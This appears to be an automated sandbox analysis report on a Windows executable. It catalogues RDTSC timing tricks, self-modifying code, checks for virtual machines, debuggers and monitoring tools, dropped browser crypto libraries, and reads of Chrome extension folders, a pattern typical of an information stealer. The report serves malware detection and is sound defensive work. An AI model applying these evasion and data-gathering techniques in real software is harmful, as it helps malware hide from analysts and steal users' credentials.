Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109D725 second address: 109D737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F7451925Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109DB9F second address: 109DBF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D59302h 0x00000007 jg 00007F2F74D59314h 0x0000000d jmp 00007F2F74D59308h 0x00000012 jns 00007F2F74D592F6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b pushad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push edi 0x0000001f pop edi 0x00000020 pushad 0x00000021 popad 0x00000022 jbe 00007F2F74D592F6h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b jnl 00007F2F74D592F6h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109DBF0 second address: 109DC00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F2F74519256h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109DC00 second address: 109DC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109DC04 second address: 109DC27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2F74519265h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F2F74519256h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109E934 second address: 109E943 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jng 00007F2F74D592F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109E943 second address: 109E949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109E949 second address: 109E96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F74D59309h 0x00000009 jng 00007F2F74D592F6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A295A second address: 10A296D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F7451925Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B1ED6 second address: 10B1EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B1EDD second address: 10B1EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2F74519256h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2F74519262h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B1EFC second address: 10B1F0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F2F74D59302h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B1F0D second address: 10B1F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B5F14 second address: 10B5F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AE873 second address: 10AE879 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AE879 second address: 10AE87E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AE87E second address: 10AE884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AE884 second address: 10AE890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2F74D592F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C2FB3 second address: 10C2FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C2BC2 second address: 10C2BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C53AB second address: 10C53C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F74519263h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C53C4 second address: 10C53E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D59302h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D68E4 second address: 10D68EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D68EA second address: 10D68EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D68EE second address: 10D68F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D68F2 second address: 10D68F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D56D1 second address: 10D56D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D56D5 second address: 10D56EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D59306h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D56EF second address: 10D56F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D601B second address: 10D601F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D601F second address: 10D6025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D65AE second address: 10D65BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F74D592FCh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D9551 second address: 10D957A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007F2F74519256h 0x0000000f jmp 00007F2F74519269h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D957A second address: 10D9580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D9580 second address: 10D9598 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 jnl 00007F2F74519256h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D9598 second address: 10D95AB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2F74D592F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D95AB second address: 10D95B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D95B0 second address: 10D95B5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D95B5 second address: 10D95C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push esi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D97D2 second address: 10D97D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DAA4B second address: 10DAA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F7451925Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DAA5B second address: 10DAA5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DC6E2 second address: 10DC740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F74519260h 0x00000009 popad 0x0000000a push edi 0x0000000b jnc 00007F2F74519256h 0x00000011 js 00007F2F74519256h 0x00000017 pop edi 0x00000018 pushad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push edi 0x0000001c pop edi 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F2F74519268h 0x00000024 popad 0x00000025 popad 0x00000026 pushad 0x00000027 jmp 00007F2F74519265h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DC740 second address: 10DC744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DC2CC second address: 10DC2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2F74519262h 0x0000000c jmp 00007F2F74519267h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DC2FC second address: 10DC302 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DE383 second address: 10DE388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700222 second address: 5700252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D59302h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2F74D59307h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700252 second address: 57002C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2F7451925Fh 0x00000009 adc si, 8B0Eh 0x0000000e jmp 00007F2F74519269h 0x00000013 popfd 0x00000014 call 00007F2F74519260h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F2F7451925Dh 0x00000027 sub si, 1DF6h 0x0000002c jmp 00007F2F74519261h 0x00000031 popfd 0x00000032 mov ax, 3AE7h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57002C6 second address: 57002E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2F74D592FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 570032D second address: 5700331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700331 second address: 5700337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700337 second address: 5700361 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F7451925Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2F74519267h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700361 second address: 5700366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700366 second address: 5700380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2F7451925Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700380 second address: 5700390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F74D592FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700390 second address: 57003AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F7451925Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov eax, 44107B41h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF7C9F second address: FF7CAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF7CAF second address: FF7CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700AB2 second address: 5700AF6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2F74D59308h 0x00000008 xor ah, FFFFFFF8h 0x0000000b jmp 00007F2F74D592FBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F2F74D59306h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700AF6 second address: 5700B09 instructions: 0x00000000 rdtsc 0x00000002 mov ch, 40h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov cx, 54E9h 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ax, E22Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700B09 second address: 5700B31 instructions: 0x00000000 rdtsc 0x00000002 call 00007F2F74D59300h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F2F74D592FAh 0x00000014 pop esi 0x00000015 mov esi, edi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700B31 second address: 5700B48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F74519263h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700B48 second address: 5700B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5700B4C second address: 5700B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: E41B6B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: E41C15 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1011AB7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1074B91 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00BF4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00BEDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00BEE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00BEF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00BF3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00BE16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00BEBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00BF38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00BEED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00BF4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00BEDE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00BE1160 GetSystemInfo,ExitProcess,

0_2_00BE1160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1937269330.000000000171E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1937269330.000000000171E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware7
Source: file.exe, 00000000.00000002.1937269330.0000000001764000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: file.exe, 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-14760
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13569
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13584
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13572
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13589
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13624

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
